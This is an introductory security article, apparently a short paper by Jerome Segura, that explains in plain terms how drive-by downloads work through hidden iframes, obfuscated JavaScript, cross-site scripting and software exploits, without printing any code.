The hidden part of the web

The Internet has many facets which are difficult to quickly summarize but for the most part, people assimilate it with email, online shopping, blogs, multi-player games and so on…

All those activities are brought to us by a web browser which renders the code used to build each webpage. We rarely ever get to look at what is behind a page. Whether a site is using Java, Flash or is just a plain Html document, it doesn’t really matter to us. What we care about is that it looks good and it is easy to navigate.
Sometimes an apparently legitimate site will trigger an explosion of pop-ups or bring our computer to a crawl for no apparent reason. The problem is, we didn’t really see what happened because it was done “in our backs”.

In this paper we will go deep into the core of a webpage and expose the dangerous code responsible for infecting PCs.
A common expression used by security researchers is ‘drive-by download’. In a nutshell, it means that a download happens without the user’s knowledge. Another popular notion is ‘exploit’ which is a piece of code or commands that take advantage of a
bug or vulnerability in any application or Operating System with the intent to gain control of the machine.
Although a drive-by download is usually triggered by the user’s actions, it is not done willingly or wanted. Also, the sequence of actions following up a drive-by download can be done silently and stealthily to avoid the user’s awareness.

We will focus on browsing the web, as the main vector for drive-by downloads to occur. As mentioned earlier, web pages consist of lines of code that are interpreted by the web browser (Internet Explorer, Firefox). Most of the time, the code used is totally legitimate and actually makes the web page more user friendly and gives it many different functionalities. For example, some code will be able to determine what browser the user has, what the screen resolution is, etc. Therefore the webpages interact not only on their server side, but also locally on the client side which is the user’s PC.

IFrames
An Iframe is an HTML element that enables to embed a HTML document within an already existing one. Iframes are often used to insert ads within a webpage. To make it sound more simple, it is what Picture-in-Picture is to the TV. The dimensions of the
Iframe can be set up manually, which is an important point to mention. Hackers use Iframes as a way to embed a malicious website into a legitimate one.
Because hackers do not wish the users or even better the webmaster to notice them, they usually set their size as 0 for both width and height.

Figure 1: Two IFrames are inserted into the source code of the webpage.

JavaScript Obfuscation
Although Iframes are difficult to spot, malware authors want to make sure they are not detected by search engines and other security tools. One way of doing this is to write a piece of code containing an Iframe and obfuscate it so that it is not easily readable.
A lot of webmasters will actually legitimately use JavaScript code to protect the copyright of their website’s source code.
Unfortunately, the browser will decode and execute the code regardless of its intent.

Figure 2: Obfuscated Javascript hides a malicious URL

Other JavaScript malicious code
JavaScript enables a malware author to run malicious code on the victim’s computer. One example of this security problem is called cross-site scripting. It happens when an attacker can force a legitimate site to include a malicious script in the page presented to the current victim. (Note that the same legitimate website accessed by a different person on another computer is totally legitimate, which is different from a permanent Iframe infection that affects everyone accessing the site).

For example, if a user logs into his online banking website and at the same time opens up
another webpage, that second page can load malicious code and take control of the
banking website.

Figure 3: poorly written malicious JavaScript

Pure exploits
Exploits, also known as attacks, take advantage of software vulnerabilities. As alarming as that sounds, there are many known exploits still unpatched by Microsoft or other software companies. Blackhat hackers are constantly looking for new ways to find a bug in the common software or Operating Systems. Some exploits are released in the wild (out there on the Internet) before anybody has a fix for them. They are called ‘zero day exploits’.
Although we can patch our PCs for older exploits, we are still vulnerable to the zero-day ones.
Types of exploits include memory overflow, SQL injection, and other types of code injections.

Figure 4: a malicious DLL file caused an exception in Internet Explorer 7

As we saw, malware authors are using all sorts of techniques to distribute their malicious code. It’s not always in their interest to make it visible to the user. For example, some credit card or password stealing Trojan relies on being stealh and undetected.
There are many hot debates on which browser is most secure. After all, the browser is your gateway to the Internet. There is however a general consensus that Internet Explorer is one of the most unsafe browser. Because it is the default browser on Windows machines, it is heavily target by hackers. But vulnerabilities are not unique to Microsoft products, and concern everybody. Firefox, often praised as the most secure browser, has had its share and periodically patches itself up.

This is just a reminder that the online safety battle is far from being over.

Jerome Segura